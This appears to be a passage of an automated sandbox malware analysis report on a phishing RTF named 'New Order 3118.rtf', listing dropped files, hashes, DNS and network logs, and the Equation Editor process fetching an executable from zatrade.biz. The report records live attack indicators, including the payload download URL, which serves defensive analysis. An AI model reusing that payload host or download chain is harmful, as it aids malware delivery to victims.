          Entropy (8bit):4.43530643106624
          Encrypted:false
          SSDEEP:3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLP61IwcWWGu:q43tISl6kXiMIWSU6XlI5LP8IpfGu
          MD5:4F8E702CC244EC5D4DE32740C0ECBD97
          SHA1:3ADB1F02D5B6054DE0046E367C1D687B6CDF7AFF
          SHA-256:9E17CB15DD75BBBD5DBB984EDA674863C3B10AB72613CF8A39A00C3E11A8492A
          SHA-512:21047FEA5269FEE75A2A187AA09316519E35068CB2F2F76CFAF371E5224445E9D5C98497BD76FB9608D2B73E9DAC1A3F5BFADFDC4623C479D53ECF93D81D3C9F
          Malicious:false
          Reputation:moderate, very likely benign file
          Preview:<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>..
          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
          File Type:data
          Category:dropped
          Size (bytes):16384
          Entropy (8bit):0.0
          Encrypted:false
          SSDEEP:3::
          MD5:CE338FE6899778AACFC28414F2D9498B
          SHA1:897256B6709E1A4DA9DABA92B6BDE39CCFCCD8C1
          SHA-256:4FE7B59AF6DE3B665B67788CC2F99892AB827EFAE3A467342B3BB4E3BC8E5BFE
          SHA-512:6EB7F16CF7AFCABE9BDEA88BDAB0469A7937EB715ADA9DFD8F428D9D38D86133945F5F2F2688DDD96062223A39B5D47F07AFC3C48D9DB1D5EE3F41C8D274DCCF
          Malicious:false
          Reputation:high, very likely benign file
          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
          File Type:data
          Category:dropped
          Size (bytes):1024
          Entropy (8bit):0.05390218305374581
          Encrypted:false
          SSDEEP:3:ol3lYdn:4Wn
          MD5:5D4D94EE7E06BBB0AF9584119797B23A
          SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
          SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
          SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
          Malicious:false
          Reputation:high, very likely benign file
          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
          File Type:data
          Category:dropped
          Size (bytes):1024
          Entropy (8bit):0.9254310571932136
          Encrypted:false
          SSDEEP:6:ilHCONgREqAWlgFJkSDlll8vlwvkvjlFwQFrB:t6k5uFJn7uvqcRKQZB
          MD5:F8C0166D302A1D0A40F95AAA5D456796
          SHA1:0AFFC67915CB41CE286E07C15183FA326BFB327E
          SHA-256:E0E50EA32DE39408247FC99446938B03B5EA8C658E7F9EEC901D54D817767DF2
          SHA-512:D4796282AED60E6115E81C52CE76C859FAE84CF83225005338D64F82F1F9EE07F8B97000285E3E361CF38F85035365DDDDE0464B02DA2795C868A83DF01DA427
          Malicious:false
          Reputation:low
          Preview:2.4.1.9.0.3.9.7.{.'.'.'.=......... .E.q.u.a.t.i.o.n...3.E.M.B.E.D..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...............................................................................................................................................................................................................................................................................................................................................................................................................................j....CJ..OJ..QJ..U..^J..aJ.. .j.D.i...CJ..OJ..QJ..U..^J..aJ.
          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:03 2023, mtime=Fri Aug 11 15:42:03 2023, atime=Mon Mar 25 16:44:48 2024, length=3797, window=hide
          Category:dropped
          Size (bytes):1034
          Entropy (8bit):4.53494103171505
          Encrypted:false
          SSDEEP:12:8l46+i/ctgXg/XAlCPCHaXaMBoB/J89rX+WDz5WlN5TF2icvbptySlXIlTFyDtZb:8mtio/XTKMSc9lz8he/71Dv3qFk7N
          MD5:A171A8B15BCF5ED48A1025820229B047
          SHA1:7DC195FA6702F76E551E65FDD089700A217E93ED
          SHA-256:DC141E49CC8D8732C1511DB1C1C38753762101CF32A4764ABF50EEDAE5E3B8EF
          SHA-512:F80838DF85479C408E52A26BD5441F1AE1F0095D105529ED4513399D31D2BF0838ED25993726D27BC2E35111712B29252A05463AFBC77D49508C9CE25C8A6F89
          Malicious:false
          Reputation:low
          Preview:L..................F.... ...OR..r...OR..r...w..!.~...............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....zX....user.8......QK.XzX..*...&=....U...............A.l.b.u.s.....z.1......WC...Desktop.d......QK.X.WC.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....n.2.....yX.. .NEWORD~1.RTF..R.......WB..WB.*.........................N.e.w. .O.r.d.e.r. .3.1.1.8...r.t.f.......|...............-...8...[............?J......C:\Users\..#...................\\745773\Users.user\Desktop\New Order 3118.rtf.).....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.N.e.w. .O.r.d.e.r. .3.1.1.8...r.t.f.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......745773..........D_....3N...W...9.W.e8...8.....[D_
          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
          File Type:Generic INItialization configuration [folders]
          Category:dropped
          Size (bytes):63
          Entropy (8bit):4.517372487769167
          Encrypted:false
          SSDEEP:3:HgA/Cm4yCv:HFO
          MD5:5CB4A597993DF92479B9516B6B3BEBB0
          SHA1:7AFE084E9C8A1CE3099F955ACD001A2AA934475C
          SHA-256:FDB9904DDE4384FF9462891A2A341374FAAAA1A12735C1D8A3CCB13AE05576A5
          SHA-512:D44110FB31F949F9DCCD0935E64403D097034E33F826AA0678F6BDA4BD84957F76C8D4ABE1842238BB6D20BB7CD6E656DC7A90039633C6A086022A5956923BC8
          Malicious:false
          Reputation:low
          Preview:[misc]..New Order 3118.LNK=0..[folders]..New Order 3118.LNK=0..
          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
          File Type:data
          Category:dropped
          Size (bytes):162
          Entropy (8bit):2.4797606462020307
          Encrypted:false
          SSDEEP:3:vrJlaCkWtVyxblgl0nGltlMWtVGXlcNOllln:vdsCkWtMe2G/LkXh/l
          MD5:89AFCB26CA4D4A770472A95DF4A52BA8
          SHA1:C3B3FEAEF38C3071AC81BC6A32242E6C39BEE9B5
          SHA-256:EF0F4A287E5375B5BFFAE39536E50FDAE97CD185C0F7892C7D25BD733E7D2F17
          SHA-512:EA44D55E57AEFA8D6F586F144CB982145384F681D0391C5AD8E616A67D77913152DB7B0F927E57CDA3D1ECEC3D343A1D6E060EAFF8E8FEDBE38394DFED8224CC
          Malicious:false
          Reputation:moderate, very likely benign file
          Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
          File Type:data
          Category:dropped
          Size (bytes):162
          Entropy (8bit):2.4797606462020307
          Encrypted:false
          SSDEEP:3:vrJlaCkWtVyxblgl0nGltlMWtVGXlcNOllln:vdsCkWtMe2G/LkXh/l
          MD5:89AFCB26CA4D4A770472A95DF4A52BA8
          SHA1:C3B3FEAEF38C3071AC81BC6A32242E6C39BEE9B5
          SHA-256:EF0F4A287E5375B5BFFAE39536E50FDAE97CD185C0F7892C7D25BD733E7D2F17
          SHA-512:EA44D55E57AEFA8D6F586F144CB982145384F681D0391C5AD8E616A67D77913152DB7B0F927E57CDA3D1ECEC3D343A1D6E060EAFF8E8FEDBE38394DFED8224CC
          Malicious:false
          Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
          File type:Rich Text Format data, version 1
          Entropy (8bit):4.821427895952533
          TrID:
          • Rich Text Format (5005/1) 55.56%
          • Rich Text Format (4004/1) 44.44%
          File name:New Order 3118.rtf
          File size:3'797 bytes
          MD5:99a565b1df705062e82bd4d7587c2959
          SHA1:1817b3ef54cf96f71bbb581ef21c37c820c125f0
          SHA256:e8fac55896700a6e6505cc1b8d4f98570358c0a1275564d587845cfb5ec47068
          SHA512:6893bb6540e7c92cb2d39dae83dd7e16a5ed0cc8bc468e13d65dc1a4e5b909bc9a249b306323167a986ee199b6ff6a9d444b673028e4b92aeb9b0b62607ed15c
          SSDEEP:48:ofay8ypNmpIBWJ993C4hQYqOSRj3jK3Uufl6bc7BsQjtGkCJ6DKNdFlVmo7iC+Op:8ay3NpoBh+Yqz3j0gUDSJIo71tIDocqn
          TLSH:DA715D2B99042D53F983A5F6F58A3C2560F3F96B02CF5E005936F7BA2C27355E026600
          File Content Preview:{\rtf1..{\*\tnUJZMF1qacx5wXPF7Gi9Ek5xIGf1tMvo9y9DxmK4NsFtNgkxl1MTSa79nWc1QLNJ44Pqsc0UoStwLRUkQ1WXgcpZuDUVgK3OQ3FyWXg9ob1lGaGeyYKsLcsDWeQ166b79Co9IK13GcosXwkhLtx0pNv9X5a75RgV9oHtbkgG5nOoZEavQKYUYfcPtn8I29waJ9nkrbJoBOx7mHRM89HqvHbzS6E6Lz3OXVWESfZhShdJYry}..
          Icon Hash:2764a3aaaeb7bdbf
          IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
          00000014Bhno
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 26, 2024 19:44:52.498389006 CET | 49165 | 80 | 192.168.2.22 | 185.236.228.49
Mar 26, 2024 19:44:52.680484056 CET | 80 | 49165 | 185.236.228.49 | 192.168.2.22
Mar 26, 2024 19:44:52.680588961 CET | 49165 | 80 | 192.168.2.22 | 185.236.228.49
Mar 26, 2024 19:44:52.680857897 CET | 49165 | 80 | 192.168.2.22 | 185.236.228.49
Mar 26, 2024 19:44:52.860960007 CET | 80 | 49165 | 185.236.228.49 | 192.168.2.22
Mar 26, 2024 19:44:52.861654997 CET | 80 | 49165 | 185.236.228.49 | 192.168.2.22
Mar 26, 2024 19:44:52.861704111 CET | 49165 | 80 | 192.168.2.22 | 185.236.228.49
Mar 26, 2024 19:44:52.871974945 CET | 49166 | 443 | 192.168.2.22 | 185.236.228.49
Mar 26, 2024 19:44:52.871999979 CET | 443 | 49166 | 185.236.228.49 | 192.168.2.22
Mar 26, 2024 19:44:52.872118950 CET | 49166 | 443 | 192.168.2.22 | 185.236.228.49
Mar 26, 2024 19:44:52.881002903 CET | 49166 | 443 | 192.168.2.22 | 185.236.228.49
Mar 26, 2024 19:44:52.881012917 CET | 443 | 49166 | 185.236.228.49 | 192.168.2.22
Mar 26, 2024 19:44:53.250047922 CET | 443 | 49166 | 185.236.228.49 | 192.168.2.22
Mar 26, 2024 19:44:53.250195026 CET | 49166 | 443 | 192.168.2.22 | 185.236.228.49
Mar 26, 2024 19:44:53.255448103 CET | 49166 | 443 | 192.168.2.22 | 185.236.228.49
Mar 26, 2024 19:44:53.255460978 CET | 443 | 49166 | 185.236.228.49 | 192.168.2.22
Mar 26, 2024 19:44:53.255845070 CET | 443 | 49166 | 185.236.228.49 | 192.168.2.22
Mar 26, 2024 19:44:53.255896091 CET | 49166 | 443 | 192.168.2.22 | 185.236.228.49
Mar 26, 2024 19:44:53.318337917 CET | 49166 | 443 | 192.168.2.22 | 185.236.228.49
Mar 26, 2024 19:44:53.336297035 CET | 443 | 49166 | 185.236.228.49 | 192.168.2.22
Mar 26, 2024 19:44:53.336354971 CET | 49166 | 443 | 192.168.2.22 | 185.236.228.49
Mar 26, 2024 19:44:53.435904980 CET | 49165 | 80 | 192.168.2.22 | 185.236.228.49
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 26, 2024 19:44:52.289133072 CET | 54562 | 53 | 192.168.2.22 | 8.8.8.8
Mar 26, 2024 19:44:52.486057043 CET | 53 | 54562 | 8.8.8.8 | 192.168.2.22
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Mar 26, 2024 19:44:52.289133072 CET | 192.168.2.22 | 8.8.8.8 | 0xae6f | Standard query (0) | zatrade.biz | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Mar 26, 2024 19:44:52.486057043 CET | 8.8.8.8 | 192.168.2.22 | 0xae6f | No error (0) | zatrade.biz | (none) | 185.236.228.49 | A (IP address) | IN (0x0001) | false
• zatrade.biz
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.22 | 49165 | 185.236.228.49 | 80 | 1096 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Timestamp | Bytes transferred | Direction | Data
Mar 26, 2024 19:44:52.680857897 CET | 317 | OUT | GET /6nSkW0jqkE1okon.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: zatrade.biz
Connection: Keep-Alive
Mar 26, 2024 19:44:52.861654997 CET | 369 | IN | HTTP/1.1 301 Moved Permanently
          Server: nginx
          Date: Tue, 26 Mar 2024 18:44:52 GMT
          Content-Type: text/html
          Content-Length: 162
          Connection: keep-alive
          Location: https://zatrade.biz/6nSkW0jqkE1okon.exe
          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

          Target ID:0
          Start time:18:44:48
          Start date:25/03/2024
          Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
          Wow64 process (32bit):false
          Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
          Imagebase:0x13f430000
          File size:1'423'704 bytes
          MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:false

          Target ID:2
          Start time:18:44:49
          Start date:25/03/2024
          Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
          Wow64 process (32bit):true
          Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Imagebase:0x400000
          File size:543'304 bytes
          MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          Target ID:5
          Start time:18:45:10
          Start date:25/03/2024
          Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
          Wow64 process (32bit):true
          Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Imagebase:0x400000
          File size:543'304 bytes
          MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:false

            Memory Dump Source
            • Source File: 00000002.00000002.340815170.000000000053F000.00000004.00000020.00020000.00000000.sdmp, Offset: 0053F000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_53f000_EQNEDT32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 01d3b10c7c01290b7007731cab21ef23807dd42a570890b870c892281f958ea3
            • Instruction ID: 03ec910d94765c6099d78da888bb45588d6d6e2470d8e683c6736e6fd62cb678
            • Opcode Fuzzy Hash: 01d3b10c7c01290b7007731cab21ef23807dd42a570890b870c892281f958ea3
            • Instruction Fuzzy Hash: C861BB8548E3D11FD74383B4982E961BFA12E5716174FC2DF94895F9B3E388891AD323
            Uniqueness

            Uniqueness Score: -1.00%